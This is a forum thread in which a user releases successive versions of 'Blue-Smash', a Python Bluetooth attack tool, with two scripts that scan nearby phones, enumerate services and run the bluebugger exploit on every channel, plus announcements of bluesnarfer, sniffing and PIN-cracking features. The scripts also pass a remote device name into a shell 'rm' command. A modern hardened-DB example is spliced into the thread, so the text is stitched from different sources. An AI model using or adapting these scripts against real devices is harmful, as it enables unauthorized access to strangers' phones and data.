
Thread: Download Blue|Smash v1.0a BETA

  1. #21
    Junior Member unix_r00ter's Avatar
    Join Date
    Feb 2007
    Posts
    64

    Default

    great work! thanks

  2. #22
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    Hey guys

    Sorry I haven't been around, I've just moved into my new flat over Jan and have been decorating etc.

    I've now got an internet connection and I am going to start work again on blue-track, but I'm going to change the name because of a snotty email lol

    I will post more soon

    Cheers

    tH3 Gr33n5t3r

    Well, sorry about the last version of blue-track, did it actually work? lol. Well, I've changed the name to blue-smash, fixed everything that didn't work and done a general tidy up. Here is the new version

    Blue-Smash v1.0a

    Looking into adding a sqlite db for autopwn etc and looking into a couple more exploits to add.

    Enjoy

    Hey again guys

    First thing is that I've noticed yet more tyop's in my code, sorry. Spent a few hours testing everything and I am confident the next version will be much cleaner.

    Next is I've started work on the autopwn function. I don't think I can get this to work exactly the same as Metasploit's because I do not have the skill. Instead I am going to code it so it checks all Bluetooth exploits against a chosen target and prints out a report that tells you if any of the exploits were successful.

    In a future version I hope to add device type and manufacturer detection for a more targeted approach. Also planning a Bluetooth chat function and a Bluetooth virtual keyboard :P

    I've done the scanning and profiling stuff and now working on the exploit stuff.

    Code:
    #### blue-smash autopwn ####
    try:
      import os,time,sys
      from pysqlite2 import dbapi2 as sqlite
      from bluetooth import *
    except ImportError, e:
        raise ImportError("Your system is missing some dependencies, Please read the README file.")
    
    # scan for nearby devices
    
    print "Blue-Smash Autopwn Function :p"
    print "Scanning for devices......."
    listno1 = 0
    nearby_devices = discover_devices(lookup_names = True)
    
    # create menu 
    
    for name, addr in nearby_devices:
      listno1 += (1)
      print "%s) %s - %s" % (listno1, name, addr)
      victim = raw_input ("Choose a Number....:")
    
    # create DB
    
      if victim == '%s'% (listno1):
        if os.path.exists(name):
          print "DB already exists! Removing old DB......."
          os.system("rm %s" % (name))
        print "Creating sqlite DB %s" % (name)
        con1 = sqlite.connect (name)
        c = con1.cursor()
        c.execute('''CREATE TABLE fingerprint_results (
           id INTEGER PRIMARY KEY,
           name TEXT,
           port TEXT,
           status TEXT
          )''')
        services = find_service(address=name)
        if len(services) > 0:
          print "Blue-Smash found %d services on %s" % (len(services), name)
          print
        else:
          print "Sorry no services were found on %s :("% (name)
        for svc in services:
          print "Found %s on channel/PSM %s"% (svc["name"],svc["port"]) 
          c.execute('insert into fingerprint_results values (null, ?, ?, null)', (svc["name"],svc["port"]))
          con1.commit()
        print "Exploiting %s Stand by MwHaAhaA"% (name)
      else:
        print "Error!!! Blue-Smash will now exit."

    If anybody spots anything a bit back to front or wrong, let me know as I'm still learning

    UPDATE

    Sorry, noticed mods keep having to squeeze my posts, my apologies.
    Just been playing around and came up with this little script. It scans for devices, finds all open ports, creates a DB, checks all ports to see if the device is vulnerable to the bluebugger exploit and saves this info to the DB. This is a bit untidy but works :P

    Code:
    # autopwn brainstorm
    
    try:
      import os,time,sys
      from pysqlite2 import dbapi2 as sqlite
      from bluetooth import *
    except ImportError, e:
        raise ImportError("Your system is missing some dependencies, Please read the README file.")
    
    # define bluebugger test exploit
    
    def exp_bluebugger():
      print "Creating temp RFCOMM Device"
      if not os.path.exists("/dev/rfcomm0"):
        os.spawnlp(os.P_WAIT,'mknod','mknod','/dev/rfcomm0','c','216','0')
      print "Starting Bluebugger..."
      con1 = sqlite.connect (name)
      c = con1.cursor()
      c.execute("select port from fingerprint_results order by port")
      print (svc["port"])
      auto_bluebugger=os.popen("bluebugger -c %s -o bluebugger.txt -a %s info "% (svc["port"],name))
    
    # scan for devices
    
    print "Blue-Smash Autopwn Function :p"
    print "Scanning for devices......."
    listno1 = 0
    nearby_devices = discover_devices(lookup_names = True)
    for name, addr in nearby_devices:
      listno1 += (1)
      print "%s) %s - %s" % (listno1, name, addr)
      victim = raw_input ("Choose a Number....:")
    
    # Create DB 
    
      if victim == '%s'% (listno1):
        if os.path.exists(name):
          print "DB already exists! Removing old DB......."
          os.system("rm %s" % (name))
        print "Creating sqlite DB %s" % (name)
        con1 = sqlite.connect (name)
        c = con1.cursor()
        c.execute('''CREATE TABLE fingerprint_results (
           id INTEGER PRIMARY KEY,
           name TEXT,
           port TEXT,
           status TEXT
          )''')
    
    # profile device 
    
        services = find_service(address=name)
        if len(services) > 0:
          print "Blue-Smash found %d services on %s" % (len(services), name)
          print
        else:
          print "Sorry no services were found on %s :("% (name)
        fileno = 0
        for svc in services:
          fileno += (1)
          print "Found %s on channel/PSM %s"% (svc["name"],svc["port"]) 
    
    # Call exploit function
    
          exp_bluebugger()
    
    # check to see if port is vunerable & update DB
    
          vun_check = open("bluebugger.txt", "r")
          linelist = vun_check.readlines()
          vun_check.close()
          if len(linelist) > 6:
            c.execute('insert into fingerprint_results (id, name, port, status) values (null, ?, ?, ?)', (svc["name"],svc["port"], 'y'))
            con1.commit()
            print ":) is vulnerable"
          else:
            c.execute('insert into fingerprint_results (id, name, port, status) values (null, ?, ?, ?)', (svc["name"],svc["port"], 'n'))
            con1.commit()
            print ":( Not vulnerable"
          vun_check.close()
      else:
        print "Error!!!  target doesn't exist :D autopwn will now exit."
    
    # EOF Biatch :P
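
Both scripts above pass the remote device's advertised name straight into `os.system("rm %s" % (name))` and `sqlite.connect(name)`, so a string chosen by the other device reaches a shell and the file system. The following is an added example, not part of the original post or of Blue-Smash, showing that DB handling hardened: Python 3 with the standard `sqlite3` module instead of `pysqlite2`, hypothetical function names, and constructed sample data.

```python
import os
import re
import sqlite3
import tempfile

MAC_RE = re.compile(r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}")

def db_path_for(addr, base_dir):
    # Name the DB after the validated address, never after the remote-supplied name.
    if not MAC_RE.fullmatch(addr):
        raise ValueError("not a Bluetooth address: %r" % (addr,))
    return os.path.join(base_dir, addr.replace(":", "").lower() + ".sqlite")

def open_fresh_db(path):
    # os.remove replaces os.system("rm ..."): no shell ever parses the path.
    if os.path.exists(path):
        os.remove(path)
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE fingerprint_results ("
                "id INTEGER PRIMARY KEY, name TEXT, port TEXT, status TEXT)")
    return con

def record_services(con, services):
    # Remote-supplied strings are stored through bound parameters only.
    con.executemany(
        "INSERT INTO fingerprint_results VALUES (NULL, ?, ?, NULL)",
        [(s["name"], str(s["port"])) for s in services])
    con.commit()
    return con.execute(
        "SELECT name, port FROM fingerprint_results ORDER BY id").fetchall()

def demo():
    # Constructed sample data: a name carrying shell metacharacters.
    name, addr = "phone; touch injected", "00:11:22:33:44:55"
    services = [{"name": name, "port": 1}]  # the name is kept as data only
    with tempfile.TemporaryDirectory() as d:
        path = db_path_for(addr, d)
        con = open_fresh_db(path)
        rows = record_services(con, services)
        con.close()
        con = open_fresh_db(path)  # second run removes and recreates the file
        left = con.execute("SELECT COUNT(*) FROM fingerprint_results").fetchone()[0]
        con.close()
        return os.path.basename(path), rows, left

if __name__ == "__main__":
    print(demo())
```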

  3. #23
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default blue-smash v1.0b

    Hey guys

    Just finished blue-smash-v1.0b, in this version everything works. Also added the vulnerability scanner function.

    The scanner scans for devices, fingerprints the device and tries the bluebugger and bluesnarfer exploits on all found channels. Then it prints out a report and tells you of possible vulnerable ports.

    Blue-Smash v1.0b

    Next version will be some time because I want to look into more exploits and possible new exploits. Also want to start learning C. But it should include the Bluetooth chat and HID keyboard function.

  4. #24
    Member s1lang's Avatar
    Join Date
    Sep 2007
    Posts
    189

    Default

    Thank you

    I will definitely be trying this 2moro on my old phones

  5. #25
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default Linux bluetooth sniffing

    Hey guys

    After a lot of sniffing around and reading white papers I have found a POC sniffing script for the Frontline drivers. I've tinkered with it a bit and got it to work on my modified CSR Bluetooth dongle

    I have successfully sniffed and stored packets. Only about 3 lol, so it looks very promising.

    Now going to have a bit more of a tinker, then going to add it to blue-smash hehehe, and also included in the script is a pin cracker mwahahaha

    Now we are on the way to Bluetooth sniffing in *nux for less

  6. #26
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default Blue-Smash v1.0c

    Hey Guys

    Well, here it is: Blue-Smash v1.0c with its fully functional sniffing function. You will have to have a modified & calibrated CSR Bluetooth dongle like described in my Bluetooth tutorial.

    I've been testing and sniffing all afternoon and it all looks good. All you need is the master's MAC and one of the slave's and you are good to go.

    Click below to download....

    Blue_Smash v1.0c

    Bluetooth Sniffing with Blue-Smash Video Tutorial / Demo

    Online Demo Vid (No Sound)

    Enjoy

  7. #27
    Member s1lang's Avatar
    Join Date
    Sep 2007
    Posts
    189

    Default

    thanks mate

  8. #28
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    13

    Default

    I am getting an install error
    anyone else having this problem?
    Thanks
    Ralhaz

  9. #29
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    Hey Ralhaz

    I haven't come across any installation errors yet? Also had 400 downloads and no one's moaned yet

    What's the error message?

    Many Thanks

    Drgr33n

  10. #30
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    Quote Originally Posted by Ralhaz View Post
    I am getting install error
    anyone else having this problem?
    Thanks
    Ralhaz
    Might be useful to post the error...
    dd if=/dev/swc666 of=/dev/wyze
